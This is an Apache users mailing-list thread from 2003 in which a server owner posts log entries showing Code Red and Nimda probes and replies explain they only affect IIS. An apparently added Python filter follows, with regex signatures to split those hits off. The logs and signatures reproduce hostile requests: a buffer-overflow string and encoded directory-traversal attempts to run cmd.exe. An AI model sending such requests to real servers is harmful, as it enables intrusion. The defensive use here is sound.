Posted to users@httpd.apache.org by John Doumani <fu...@attbi.com> on 2003/04/09 01:41:20 UTC

[users@httpd] strange hits being logged -Worm?

Hello,

I have recently started seeing these lines of code repeated in my log files
for each virtual host. Is this a worm or some other attack on my server?

If so, what is the best way to protect the server from attack?

John


12.210.8.252 - - [07/Apr/2003:15:21:08 -0700] "GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u
9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078
%u0000%u00=a  HTTP/1.0" 404 -
12.210.23.223 - - [07/Apr/2003:15:58:39 -0700] "GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u
9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078
%u0000%u00=a  HTTP/1.0" 404 -
12.210.0.150 - - [07/Apr/2003:16:16:05 -0700] "GET /scripts/root.exe?/c+dir
HTTP/1.0" 404 -
12.210.0.150 - - [07/Apr/2003:16:16:05 -0700] "GET /MSADC/root.exe?/c+dir
HTTP/1.0" 404 -
12.210.0.150 - - [07/Apr/2003:16:16:06 -0700] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
12.210.0.150 - - [07/Apr/2003:16:16:06 -0700] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
12.210.0.150 - - [07/Apr/2003:16:16:07 -0700] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
12.210.0.150 - - [07/Apr/2003:16:16:08 -0700] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 -
12.210.0.150 - - [07/Apr/2003:16:16:08 -0700] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 -
12.210.0.150 - - [07/Apr/2003:16:16:09 -0700] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
stem32/cmd.exe?/c+dir HTTP/1.0" 404 -
12.210.0.150 - - [07/Apr/2003:16:16:09 -0700] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
12.210.0.150 - - [07/Apr/2003:16:16:09 -0700] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
12.210.0.150 - - [07/Apr/2003:16:16:09 -0700] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
12.210.0.150 - - [07/Apr/2003:16:16:09 -0700] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
12.210.0.150 - - [07/Apr/2003:16:16:10 -0700] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 304
12.210.0.150 - - [07/Apr/2003:16:16:10 -0700] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 304
12.210.0.150 - - [07/Apr/2003:16:16:10 -0700] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
12.210.0.150 - - [07/Apr/2003:16:16:11 -0700] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
12.210.8.252 - - [07/Apr/2003:16:18:19 -0700] "GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u909
0%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0
000%u00=a  HTTP/1.0" 404 -


<<><<>><<>><<>><<>><<>>
John e Doumani
fuguma@attbi.com

~Navigating the Web long before the Internet~



---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
   "   from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org


Re: [users@httpd] strange hits being logged -Worm?

Posted by Zac Stevens <zt...@cryptocracy.com>.
On Tue, Apr 08, 2003 at 08:25:21PM -0400, Jeremy D. Weiss wrote:
> Question to the list in general: I know there are FAQs on Apache's site, 
> might this be added to them?  There seem to have been a LOT of questions 
> about it, recently...

Given that the signatures change with every new worm, I see little point in
putting them into the Apache FAQ.  It's not related to Apache, and I'm not
sure who would volunteer to keep the list up to date :)

My opinion is that the answers to these questions are readily found by
searching Google, the list archives, or a security-oriented site such as
CERT or Bugtraq.  With that much duplication already, adding them to the
FAQ doesn't seem worthwhile...


Zac



Re: [users@httpd] strange hits being logged -Worm?

Posted by "Jeremy D. Weiss" <jd...@chanweiss.com>.
At 04:41 PM 04/08/2003 -0700, you wrote:
>Hello,
>
>I have recently started seeing these lines of code repeated in my log files
>for each virtual host. Is this a worm or some other attack on my server?
>
>If so, what is the best way to protect the server from attack?


All of the attacks listed (which I have snipped for readability's sake) are 
of the nimda/code red variety.  Assuming you are running Apache (what with 
posting to this list, and all :) there is absolutely nothing you need to 
do to be protected... only IIS is vulnerable to those attacks.

Question to the list in general: I know there are FAQs on Apache's site, 
might this be added to them?  There seem to have been a LOT of questions 
about it, recently...

==Jeremy





RE: [users@httpd] strange hits being logged -Worm?

Posted by Koen Vingerhoets <ko...@ubench.com>.
Hi!!

code red code red call the marines!!!

It only affects (unpatched) IIS systems... no need to worry.

If you look through the archives, you'll find several users that have posted
their settings to ignore these entries or to dump them in another file.

Koen



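An added example, not code from the thread or from the Apache project: a small Python filter that parses lines in Apache's common log format, tags the Code Red (`/default.ida?XXX...%u...`) and Nimda (`root.exe`, `cmd.exe` via encoded `..\`) probes seen in John's log, and splits them off so they can be counted per source host or written to a separate file, as Koen describes. The sample lines are constructed, shortened versions of the entries above; the `192.0.2.10` line is made up as a normal request.

```python
import re
from collections import Counter

# Apache common log line: host ident user [time] "request" status bytes.
# The Code Red request in the thread has two spaces before "HTTP/1.0",
# so the gap between path and protocol is matched with \s+ rather than " ".
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)\s+(?P<proto>HTTP/[\d.]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)$'
)

# Request patterns taken from the log entries in the thread.
SIGNATURES = [
    ("code-red", re.compile(r"^/default\.ida\?X+%u", re.I)),
    ("nimda", re.compile(r"(root\.exe|cmd\.exe)\?/c\+", re.I)),
    ("nimda", re.compile(
        r"\.\.(%255c|%252f|%c0%af|%c0%2f|%c1%1c|%c1%9c|%%35%63|%%35c|%25%35%63)",
        re.I)),
]

# Constructed sample: shortened copies of John's entries plus one normal hit.
SAMPLE = [
    '12.210.8.252 - - [07/Apr/2003:15:21:08 -0700] "GET /default.ida?XXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u00=a  HTTP/1.0" 404 -',
    '12.210.0.150 - - [07/Apr/2003:16:16:05 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 -',
    '12.210.0.150 - - [07/Apr/2003:16:16:07 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -',
    '12.210.0.150 - - [07/Apr/2003:16:16:10 -0700] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 304',
    '192.0.2.10 - - [07/Apr/2003:16:20:00 -0700] "GET /index.html HTTP/1.0" 200 1043',
]

def parse_line(line):
    """Return the log fields as a dict, or None if the line is not common log format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def classify(path):
    """Return the worm family name for a request path, or None for a normal request."""
    for name, pat in SIGNATURES:
        if pat.search(path):
            return name
    return None

def split_log(lines):
    """Split lines into (clean, worm, Counter of (host, family)) so worm hits
    can be written to their own file and summarised per source host."""
    clean, worm, hosts = [], [], Counter()
    for line in lines:
        rec = parse_line(line)
        label = classify(rec["path"]) if rec else None
        if label:
            worm.append(line)
            hosts[(rec["host"], label)] += 1
        else:
            clean.append(line)
    return clean, worm, hosts
```

Apache itself can do the same split at logging time with `SetEnvIf Request_URI` matching these patterns and a `CustomLog ... env=` condition, which avoids post-processing the file.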